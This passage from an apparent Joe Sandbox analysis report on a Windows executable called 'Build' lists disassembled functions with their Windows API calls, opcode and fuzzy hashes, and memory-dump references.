                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1918208029-0
                                                                                                    • Opcode ID: 7fd2dfdf05a06d9535b830ac0b2de917c02da38772d44f64d9662ca656daa1a7
                                                                                                    • Instruction ID: 76526082068620aafe8bee31f0f9a044927b7a57d54142fc3f352af9fb2aa3c7
                                                                                                    • Opcode Fuzzy Hash: 7fd2dfdf05a06d9535b830ac0b2de917c02da38772d44f64d9662ca656daa1a7
                                                                                                    • Instruction Fuzzy Hash: FEE0EDB1504658EBCB50DF95C541B99B7F8EB05351F10C05AE896A3201E274AE849F51
                                                                                                    APIs
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009451CA
                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 009451D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                    • String ID:
                                                                                                    • API String ID: 1660781231-0
                                                                                                    • Opcode ID: 8930128e2013c9b987c4db2b16ab2ca3886cf81c749a40b6f2cc145cad231de1
                                                                                                    • Instruction ID: 69cef1f2621f3cb1819548808e5da66fb6e50977b852961f795732ab811019bf
                                                                                                    • Opcode Fuzzy Hash: 8930128e2013c9b987c4db2b16ab2ca3886cf81c749a40b6f2cc145cad231de1
                                                                                                    • Instruction Fuzzy Hash: 53D0A96996CF005A8C103BF02822F5A274899877B93B21A4AE4208A1C3EA92E4446212
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3351165006-0
                                                                                                    • Opcode ID: a8464b11058e19ac6e408852d0f607eec1980570d9c3a9b6b1bf6fa77aff1df2
                                                                                                    • Instruction ID: ae55f2d054fa86f6bc2e58beca74bb79b4e84fd427f79e1b4fde65c3c3e31f5e
                                                                                                    • Opcode Fuzzy Hash: a8464b11058e19ac6e408852d0f607eec1980570d9c3a9b6b1bf6fa77aff1df2
                                                                                                    • Instruction Fuzzy Hash: 73C0123206C200BECB010BF0DC0DC2ABBA8EBA4212F20CA08F0B6C1160C239C010EB11
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 431132790-0
                                                                                                    • Opcode ID: 2244b6efb6480bc2821178af162bb0dbbf8f5704a5b5a75fdf813cd3f3addd03
                                                                                                    • Instruction ID: 0830cf23a693b4fb4c6c3a1af718250fb8fbb04cbef51786e82382a97c6f71e2
                                                                                                    • Opcode Fuzzy Hash: 2244b6efb6480bc2821178af162bb0dbbf8f5704a5b5a75fdf813cd3f3addd03
                                                                                                    • Instruction Fuzzy Hash: 2EC1D874A042609FDF24DF24D8C47AD7BA9AF66310F1800B9EC46DF39ACB349A54CB61
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 00921483
                                                                                                      • Part of subcall function 00926AE8: __EH_prolog3.LIBCMT ref: 00926AEF
                                                                                                      • Part of subcall function 0092EE0F: __EH_prolog3.LIBCMT ref: 0092EE16
                                                                                                      • Part of subcall function 0092668F: __EH_prolog3.LIBCMT ref: 00926696
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 431132790-0
                                                                                                    • Opcode ID: e35266f9a591edc4584434c49c416692036a453527e23c621d40b5fd8f040d7e
                                                                                                    • Instruction ID: 09a81072043037f5122dff756a2e6c58c156566cd43fd366e8b606bf43a3584c
                                                                                                    • Opcode Fuzzy Hash: e35266f9a591edc4584434c49c416692036a453527e23c621d40b5fd8f040d7e
                                                                                                    • Instruction Fuzzy Hash: 274117B1A063808ECB14DF69A4C06D97BE1AF69300F0801BEEC5DCF69BD7755255CB62
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 431132790-0
                                                                                                    • Opcode ID: 9c3bed8be8172739962df658e31a92a67eb3bd61f428cc7b2f6eb70b78b2a38e
                                                                                                    • Instruction ID: 19cacc4888f70d378cd6d25342d2355a8a94fa2047606377ad1344d3f02d0d2f
                                                                                                    • Opcode Fuzzy Hash: 9c3bed8be8172739962df658e31a92a67eb3bd61f428cc7b2f6eb70b78b2a38e
                                                                                                    • Instruction Fuzzy Hash: CB21D6B1E41711ABDB14EFB48C46B5B76ACFB48314F46013AE909EB282D7709940CB99
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0094D348
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: 78c816ed6700b4b21cc4cb71e384d05a36463925a3c46113b2463d15f0cb0c7a
                                                                                                    • Instruction ID: 5179fe4422c2718671f72f8b205c6d14f8ad91b91251f87fb6eeee930ba7ad6b
                                                                                                    • Opcode Fuzzy Hash: 78c816ed6700b4b21cc4cb71e384d05a36463925a3c46113b2463d15f0cb0c7a
                                                                                                    • Instruction Fuzzy Hash: 0211293BA12A259B9F359F2DEC40D9E73D9EB883687164224FC15AB294D630EC0197D2
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094D7C7
                                                                                                    • _free.LIBCMT ref: 0094EB35
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                                    • Instruction ID: 3f0d63e2a7f2a9a5804031042a4eb48509c1d5f07c2572e6753c21ef2a649c16
                                                                                                    • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                                    • Instruction Fuzzy Hash: 3001F9762013456BE321CF6AD881E5AFBEDFBC5370F25051DF59583280EA70A905C774
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 431132790-0
                                                                                                    • Opcode ID: fe70cbd21d00f8bb34edc6813c912fcf0aa5f7d9fbf8db67ccb8ad56b3d91062
                                                                                                    • Instruction ID: 3efcdf568ac703104e5d2c684dbe7c549daa6bbabafafb37c17141ebed5d8f0e
                                                                                                    • Opcode Fuzzy Hash: fe70cbd21d00f8bb34edc6813c912fcf0aa5f7d9fbf8db67ccb8ad56b3d91062
                                                                                                    • Instruction Fuzzy Hash: 34018037E0063A9BCB25EE64E992FAEB376AF84700B014529FD11AB245CB759C40C792
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0094B9D3,00000001,00000364,?,0094688D,?,?,009650C4), ref: 0094D7C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 540420091e3c6b33fc67a414b8bc91405c639b6062db1007cc9d9920c05cf6e9
                                                                                                    • Instruction ID: d421998215b41057275e27a32c9fccdca5b70f1ff32d9b26a0dee001b3dbc80a
                                                                                                    • Opcode Fuzzy Hash: 540420091e3c6b33fc67a414b8bc91405c639b6062db1007cc9d9920c05cf6e9
                                                                                                    • Instruction Fuzzy Hash: 1FF0E27A256321A7EF216F76EC41F5B778C9F807A0F144112E808DA695DB24DC0087E1
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 00926696
                                                                                                      • Part of subcall function 009311A5: __EH_prolog3.LIBCMT ref: 009311AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 431132790-0
                                                                                                    • Opcode ID: dfd0e1df0302ab0c5c43c25326dcf4fdd27cb8af3a805aa85f39882af9122d6e
                                                                                                    • Instruction ID: 821fa2185da2f99fa888c4b51c14901b6cfdc61b4e58c15c945e00662d681701
                                                                                                    • Opcode Fuzzy Hash: dfd0e1df0302ab0c5c43c25326dcf4fdd27cb8af3a805aa85f39882af9122d6e
                                                                                                    • Instruction Fuzzy Hash: 87012874806B64CAD725FBB881527DDFBE4AFA4304F20044EA4AA43292CBB42704CB62
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: c2872be8987a01e7c264dcdae9eb89633ea7cf5d18781723caec466b153c6274
                                                                                                    • Instruction ID: ceb705e7d15c5400929d2b2fb2c5d9293c463091c61fffc108994a251d9c92ae
                                                                                                    • Opcode Fuzzy Hash: c2872be8987a01e7c264dcdae9eb89633ea7cf5d18781723caec466b153c6274
                                                                                                    • Instruction Fuzzy Hash: C4E0ED3124422257D720276EECD0F5B3A5C8F913A2F150221AC85A72A2CF64CC0182E4
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,0092AF75,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092AFEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: 18b46b01dad85e02c92ce2df302e1a63e0cd490e72d2ebe3e10196a6ec14c946
                                                                                                    • Instruction ID: a2f4c92b4894b30c3b5b239b828a5bda295231ee86b439580bd9e942a562887d
                                                                                                    • Opcode Fuzzy Hash: 18b46b01dad85e02c92ce2df302e1a63e0cd490e72d2ebe3e10196a6ec14c946
                                                                                                    • Instruction Fuzzy Hash: 60F0BE71496B229FDB308A21E958792B3E8AB12325F041B1EC0E7838E8D374A98D9641
                                                                                                    APIs
                                                                                                      • Part of subcall function 0092C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C4E6
                                                                                                      • Part of subcall function 0092C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?), ref: 0092C516
                                                                                                      • Part of subcall function 0092C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A), ref: 0092C522
                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C3A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1464966427-0
                                                                                                    • Opcode ID: 4d0eb5d77d39e98256f59533ccf7659a0362741493335d0d2e2deaa3bd0507b9
                                                                                                    • Instruction ID: a3cfd047cd6d63327f25d3719668457253e7e1402a4ad49970e7c849e7ab927b
                                                                                                    • Opcode Fuzzy Hash: 4d0eb5d77d39e98256f59533ccf7659a0362741493335d0d2e2deaa3bd0507b9
                                                                                                    • Instruction Fuzzy Hash: B7F082750497A0AACA227BB468057CB7BD45F66332F00CE49F1FE121EAC7B560949B72
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 176396367-0
                                                                                                    • Opcode ID: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                                    • Instruction ID: 107d0a79d8233b1abecb22cc337401ac4235fbf9e20124bed5da54da0246259d
                                                                                                    • Opcode Fuzzy Hash: e53f430e888b3b4dfe5a94193e22b92b333f5de3c29a87175f0222974f4b6146
                                                                                                    • Instruction Fuzzy Hash: 3EE04F321001416AD321AB19D804EBBABA99FC1720F14881EF594861A1CBB5E881CF61
                                                                                                    APIs
                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00932F19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecutionStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2211380416-0
                                                                                                    • Opcode ID: 46e3111a2a73756d66bb5e24697fe802f8846613736794af2eea8d8cb9aca6eb
                                                                                                    • Instruction ID: 51e6541b9f3994251da98811cf544eff26c314ad8a0a1493869fb863084c2a24
                                                                                                    • Opcode Fuzzy Hash: 46e3111a2a73756d66bb5e24697fe802f8846613736794af2eea8d8cb9aca6eb
                                                                                                    • Instruction Fuzzy Hash: 8BD05B2165C22155DB26377578067FD555A5FC2312F094066B48D771C3CB5A4C4296E2
                                                                                                    APIs
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0093C5BC
                                                                                                      • Part of subcall function 0093C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0093C36E
                                                                                                    Memory Dump Source
